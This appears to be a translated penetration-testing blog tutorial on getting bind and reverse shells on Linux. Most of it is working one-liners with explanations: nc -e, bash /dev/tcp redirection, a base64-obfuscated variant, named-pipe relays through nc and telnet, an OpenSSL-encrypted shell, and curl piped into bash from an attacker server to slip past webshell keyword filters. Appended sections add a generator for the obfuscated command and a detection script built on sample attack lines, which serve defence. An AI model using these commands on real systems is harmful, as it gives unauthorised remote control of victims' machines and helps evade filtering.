Table of contents

  • Related posts
  • Reverse shell introduction
  • Common reverse shell methods
    • NetCat (nc)
      • Bind (forward) nc
      • Reverse nc
    • Telnet
      • Bind (forward) telnet shell
      • Reverse telnet shell
    • OpenSSL
    • Curl

Related posts

  1. Linux commands commonly used for information gathering and penetration testing: xunmi.blog.csdn.net/article/det… (if you are not familiar with redirection and the standard file descriptors, read those two sections of that post first, otherwise the reverse shell commands below will be hard to follow!)
  2. Commonly used Linux privilege escalation methods: xunmi.blog.csdn.net/article/det…
  3. Reverse shell methods commonly used in penetration testing (how to get a reverse shell during a penetration test?): xunmi.blog.csdn.net/article/det…

Reverse shell introduction

A reverse shell gives us a remote console on the target so that we can issue commands and control the asset. By connection direction there are two kinds:

  1. Bind (forward) shell: the controller (our own machine) initiates the connection to the controlled host (the target), which listens on a port.

    This is affected by many factors such as firewalls and routing (inbound connections to the target are usually filtered or NATed), so it is hard to make it succeed.

  2. Reverse shell: the controlled host initiates the connection back to our controller.

    This is done to get around the firewall and routing restrictions, since outbound connections are allowed far more often than inbound ones.

Common reverse shell methods

Test machines:

  1. Kali: 192.168.1.200 (has Internet access; I usually use it as the attacker, i.e. the controller)
  2. CentOS 7: 43.128.11.131 (a Tencent Cloud VPS; I usually use it as an ordinary server, i.e. the controlled host)

NetCat (nc)

nc can be used for a bind or reverse shell on both Windows and Linux.

Bind (forward) nc

In the bind case the controlled host first listens on a chosen port, and the controller then connects to it.

  # Controlled host (-l: listen mode, -p: port number, -v: verbose output about what nc is doing, -vv: even more verbose, -e: program to run once a connection arrives)
  nc -lvvp <port> -e /bin/sh
  # for example:
  nc -lvvp 4578 -e /bin/bash

  # Controller
  nc <target IP> <port>
  # for example:
  nc 43.128.11.131 4578

  # MSF payloads (nc is not recommended as a bind handler for MSF: it is unstable, normally only gives a plain shell, and it is hard to get a stable meterpreter from it)
  payload/cmd/unix/bind_netcat
  payload/cmd/unix/reverse_netcat

Reverse nc

There are a great many reverse shell variants for the controlled side; you can generate them with an online tool such as weibell.github.io/reverse-she…. Below I go through the commonly used controlled-side reverse shell commands and explain how they work. Most scenarios in which a bind shell is used are already inside the target's intranet, where there are almost no security controls, so little attention is paid to bypassing firewalls and anti-virus. A reverse shell is different: it is usually used against machines that are reachable from the external network, and such machines generally have some security measures. (If the commands are hard to read, see the reverse shell basics part of my Linux penetration testing command basics post!)

  # Controller:
  nc -lvvp <port>
  # Controlled host:
  nc -e /bin/bash <IP> <port>

A shell bounced directly with nc is not very stable, and the target's nc may not have the -e option (-e: program redirection, the given program is executed as soon as the connection is made. It is considered a dangerous option, so many builds, for example the OpenBSD-derived netcat shipped by Debian and Ubuntu, omit it). For that case there are reverse shell commands that run on the controlled side without nc and are fully compatible with a plain nc listener on the controller.

  # Other reverse shell commands
  # The most basic one, explained in detail below
  bash -i >& /dev/tcp/<ip>/<port> 0>&1
  # Equivalent to the line above, just written differently: stdout goes to the socket, then stdin and stderr are duplicated from stdout
  bash -i > /dev/tcp/<ip>/<port> 0>&1 2>&1

  # `exec 5<>/dev/tcp/<ip>/<port>` opens a read/write socket to the controller as file descriptor 5
  # `cat <&5` reads our custom file descriptor and passes whatever arrives to the next command through the pipe
  # `while read line; do $line 2>&5 >&5; done` reads one line at a time, executes it, and sends both standard output and standard error back to descriptor 5
  exec 5<>/dev/tcp/<ip>/<port>; cat <&5 | while read line; do $line 2>&5 >&5; done

  # Same idea with descriptor 181: the socket is opened as fd 181 and sh takes its stdin, stdout and stderr from it (the leading `0<&181` runs before 181 exists, so it only prints a harmless "Bad file descriptor" message)
  0<&181; exec 181<>/dev/tcp/<ip>/<port>; sh <&181 >&181 2>&181

  # Same as the first command, with an extra layer of base64 encoding. This particular blob decodes to `bash -i >& /dev/tcp/IP/端口 0>&1`, with the literal placeholders IP and 端口 (Chinese for "port"), so re-encode it with your own listener address before use
  bash -c "echo YmFzaCAtaSA+JiAvZGV2L3RjcC9JUC/nq6/lj6MgMD4mMQ==|base64 -d|bash -i"

  # MSF payloads
  cmd/unix/bind_netcat
  cmd/unix/reverse_netcat
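As an added example (not code from the original post), the following shell helpers build the /dev/tcp one-liner for a given listener, wrap it the way the post's base64 variant does, and decode a blob back so that what it runs can be checked before it is executed or when one turns up during triage. The listener address 10.0.0.5:4444 used in the demo is an assumed placeholder.

```bash
#!/usr/bin/env bash
# Added example, not from the original post. Builds and unwraps the
# /dev/tcp reverse shell one-liners discussed above.
# The listener 10.0.0.5:4444 used in the demo is an assumed placeholder.

# Plain form: interactive bash with stdout and stderr sent to the socket
# (>&) and stdin duplicated from it (0>&1), so commands flow both ways.
rs_plain() {
    # $1 = listener IP, $2 = listener port
    printf 'bash -i >& /dev/tcp/%s/%s 0>&1' "$1" "$2"
}

# Stdout-only spelling from the post: each stream is redirected separately.
rs_plain_verbose() {
    printf 'bash -i > /dev/tcp/%s/%s 0>&1 2>&1' "$1" "$2"
}

# Base64 blob of the plain form. The encoding hides /dev/tcp, > and & from
# naive keyword filters; tr strips the line wrapping GNU base64 adds.
rs_b64_blob() {
    rs_plain "$1" "$2" | base64 | tr -d '\n'
}

# Wrapped form exactly as the post writes it: decode the blob and pipe it
# into a new interactive bash.
rs_b64() {
    printf 'bash -c "echo %s|base64 -d|bash -i"' "$(rs_b64_blob "$1" "$2")"
}

# Reverse the wrapping: show what a blob actually runs before executing
# it, or when triaging one found in a log or a webshell.
rs_b64_decode() {
    # $1 = the base64 blob
    printf '%s' "$1" | base64 -d
}

# Demo output when run as a script.
printf 'plain:   %s\n' "$(rs_plain 10.0.0.5 4444)"
printf 'wrapped: %s\n' "$(rs_b64 10.0.0.5 4444)"
printf "post's blob decodes to: %s\n" \
    "$(rs_b64_decode 'YmFzaCAtaSA+JiAvZGV2L3RjcC9JUC/nq6/lj6MgMD4mMQ==')"
```

Running the script prints the plain and wrapped forms for the placeholder listener, and shows that the post's own blob still carries the placeholders IP and 端口, which is why it has to be regenerated with rs_b64 rather than pasted as-is.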





If /dev/tcp is also unavailable on the target (a bash built without network redirection, or only sh/dash present), try the following named-pipe method.

  rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc <IP> <port> > /tmp/f
  mknod backpipe p; nc <IP> <port> 0<backpipe | /bin/bash 1>backpipe 2>backpipe

  # Generated with MSF, for example:
  msfvenom -p cmd/unix/reverse_netcat lhost=192.168.1.1 lport=4578 -f raw
  # which produces:
  mkfifo /tmp/ysngi; nc 192.168.1.1 4578 0</tmp/ysngi | /bin/sh >/tmp/ysngi 2>&1; rm /tmp/ysngi

  1. rm /tmp/<tmpfile>; mkfifo /tmp/<tmpfile>; cat /tmp/<tmpfile> | /bin/bash -i 2>&1 | nc <IP> <port> > /tmp/<tmpfile>

    1. rm /tmp/<tmpfile>: delete the temporary file first so there is no conflict if it already exists. The `;` makes the shell run the following commands one after another.

    2. mkfifo /tmp/<tmpfile>: mkfifo creates a named pipe (FIFO) on Linux. Whatever one process writes into it can be read by another process through the redirection operators (for example `cat < /tmp/<tmpfile>` keeps reading from it).

    3. cat /tmp/<tmpfile> | /bin/bash -i 2>&1 | nc <IP> <port> > /tmp/<tmpfile>

      1. cat /tmp/<tmpfile>: reads from the newly created named pipe and passes its contents to the next command through the pipe character
      2. /bin/bash -i 2>&1 | nc <IP> <port> > /tmp/<tmpfile>: an interactive bash executes the commands it receives from the previous step, its output and errors are sent to the controller through nc, and whatever the controller types (nc's output) is written back into the named pipe, where cat picks it up again. Note that this version never removes the named pipe afterwards; the MSF version appends an `rm` for that.

    MSF can generate this command automatically.

  2. mknod backpipe p; nc <IP> <port> 0<backpipe | /bin/bash 1>backpipe 2>backpipe

    1. mknod <name> p: mknod creates special files (character and block device nodes, and with `p` a FIFO). `p` here creates a named pipe that plays the same role as above: nc reads what the controller sends and pipes it into bash, and bash's standard output and standard error are written into the named pipe, which nc reads as its stdin and sends back to the controller.

Telnet

The telnet command is used to log in to and manage a remote host. It is the predecessor of SSH and has gradually been abandoned because it is far less secure than SSH, transmitting everything in plaintext. It can still be used to bounce a shell on machines that still have a telnet client.

Bind (forward) telnet shell

  # Attacker listens on two ports: one carries input to the target, the other carries its output
  nc -lvvp <input port>
  nc -lvvp <output port>
  # Target
  telnet 47.101.214.85 <input port> | /bin/bash | telnet 47.101.214.85 <output port>

Commands typed into the input listener are piped into bash, and bash's standard output is pushed to the output listener through the second telnet (standard error is not redirected here; add `2>&1` after /bin/bash if you also want error messages). Note that, despite the name, both telnet connections are initiated by the target, so the traffic is outbound, just as with a reverse shell.

Reverse telnet shell

  # Attacker
  nc -lvvp <port>
  # Target (two equivalent spellings)
  rm -f a && mknod a p && telnet <IP> <port> 0<a | /bin/bash 1>a
  rm -f a; mknod a p; telnet <IP> <port> 0<a | /bin/bash >a

OpenSSL

SSL is the secure socket layer protocol, and OpenSSL is the cryptographic toolkit that implements it on Linux. We can use it to bounce a shell over an encrypted connection, so the shell traffic cannot be read by plaintext inspection. First a key and certificate must be generated.

  # Generate a private key and self-signed certificate (on the attacker)
  openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
  # Start the listener on the attacker (run in the directory where the key and certificate were generated)
  openssl s_server -quiet -key key.pem -cert cert.pem -port 443
  # Bounce the shell on the target
  mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect <IP>:443 > /tmp/s; rm /tmp/s

The prompts asked by openssl req (country, organisation, and so on) can all be left at their defaults (I changed the country to what I believe is the code for China; I am not sure it is correct, but it does not matter here). The -quiet option on s_client matters: without it the session and certificate information that s_client prints to stdout would be written into /tmp/s and fed to sh as commands. Note also that s_client does not verify the listener's certificate here, so this hides the traffic from passive inspection but does not authenticate the other end.



Curl

Yes, this is the Linux download command. Sometimes the webshell we obtain has a filtering mechanism that strips keywords from our reverse shell command and makes it fail; in that case the command can be fetched from elsewhere and executed instead. First create an index.html on a public server with the reverse shell command in it, then start an HTTP server and listen on the port the reverse shell command uses.

  # Attacker:
  echo 'bash -i >& /dev/tcp/<ip>/<port> 0>&1' > index.html
  # for example
  echo 'bash -i >& /dev/tcp/43.128.11.131/4545 0>&1' > index.html
  # the trailing & runs the HTTP server in the background (python3's http.server listens on port 8000 by default)
  python3 -m http.server &
  nc -lvvp 4545
  # Target:
  curl 43.128.11.131:8000 | bash

The `0>&1` at the end of the fetched command is required: without it the inner bash keeps curl's pipe as its stdin, which is already exhausted, so it reads end-of-file and exits at once instead of taking commands from the listener.
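To close with the defender's side, here is an added detection check that is not part of the original post: a shell function that classifies command lines by the reverse and bind shell patterns shown on this page, run over a constructed sample of bash-history style lines. The rule names and the sample lines are mine; the address 192.168.1.200 in the sample is the post's Kali box.

```bash
#!/usr/bin/env bash
# Added example, not from the original post: flag the reverse/bind shell
# patterns shown on this page when they appear in shell history, auditd
# EXECVE records or EDR process logs. Rule names are mine; the sample
# command lines at the bottom are constructed for this example.

# _has CMD REGEX: true if the command line matches the extended regex.
_has() {
    printf '%s\n' "$1" | grep -Eq "$2"
}

# rs_classify CMD: prints the space-separated names of all matching rules
# (empty if none). Always returns 0 so it is safe under set -e.
rs_classify() {
    local cmd="$1" hits=""
    # bash network redirection, the basis of most one-liners above
    _has "$cmd" '/dev/(tcp|udp)/' && hits="$hits devtcp"
    # nc/ncat/netcat as a standalone word, given -e or -c (program to run)
    _has "$cmd" '(^|[[:space:];|&(])(nc|ncat|netcat)[[:space:]].*[[:space:]]-[ec][[:space:]]' && hits="$hits nc_exec"
    # named pipe created, then relayed through nc, telnet or openssl s_client
    _has "$cmd" 'mkfifo|mknod[[:space:]]+[^[:space:]]+[[:space:]]+p' \
        && _has "$cmd" '(^|[[:space:];|&(])(nc|ncat|netcat|telnet)[[:space:]]|s_client' \
        && hits="$hits fifo_relay"
    # base64 decode piped straight into a shell: the blob hides /dev/tcp
    _has "$cmd" 'base64[[:space:]]+(-d|--decode)[[:space:]]*[|][[:space:]]*(/bin/)?(ba|z)?sh' && hits="$hits b64_exec"
    # remote content fetched and executed without touching disk
    _has "$cmd" '(^|[[:space:];|&(])(curl|wget)[^|]*[|][[:space:]]*(/bin/)?(ba|z)?sh' && hits="$hits curl_pipe"
    # telnet output piped into a shell (both telnet variants above)
    _has "$cmd" 'telnet[^|]*[|][[:space:]]*(/bin/)?(ba|z)?sh' && hits="$hits telnet_pipe"
    printf '%s' "${hits# }"
    return 0
}

# rs_scan: reads command lines on stdin, prints "<rules><TAB><command>"
# for every line that matches at least one rule.
rs_scan() {
    local line hits
    while IFS= read -r line; do
        hits=$(rs_classify "$line")
        [ -n "$hits" ] && printf '%s\t%s\n' "$hits" "$line"
    done
    return 0
}

# Constructed sample: the page's techniques pointed at the post's Kali box,
# mixed with benign lines that a careless regex would also catch.
SAMPLE_CMDS='ls -la /var/www
bash -i >& /dev/tcp/192.168.1.200/4444 0>&1
nc -lvvp 4578 -e /bin/bash
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 192.168.1.200 4444 > /tmp/f
bash -c "echo YmFzaCAtaSA+JiAvZGV2L3RjcC9JUC/nq6/lj6MgMD4mMQ==|base64 -d|bash -i"
curl 192.168.1.200:8000 | bash
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.1.200:443 > /tmp/s
rm -f a && mknod a p && telnet 192.168.1.200 4444 0<a | /bin/bash 1>a
base64 -d archive.b64 > archive.tar
rsync -e ssh ./site/ backup:/srv/site/'

# rs_count: number of sample lines flagged by at least one rule.
rs_count() {
    printf '%s\n' "$SAMPLE_CMDS" | rs_scan | wc -l | tr -d ' '
}

printf '%s\n' "$SAMPLE_CMDS" | rs_scan
```

Seven of the ten sample lines are flagged; the `rsync -e ssh` and `base64 -d archive.b64` lines are not, because the nc rule insists on nc as a standalone word and the base64 rule only fires when the decoded output is piped into a shell. The base64-wrapped line is caught even though /dev/tcp never appears in it, which is the reason to keep a decode-to-shell rule next to the plain /dev/tcp one.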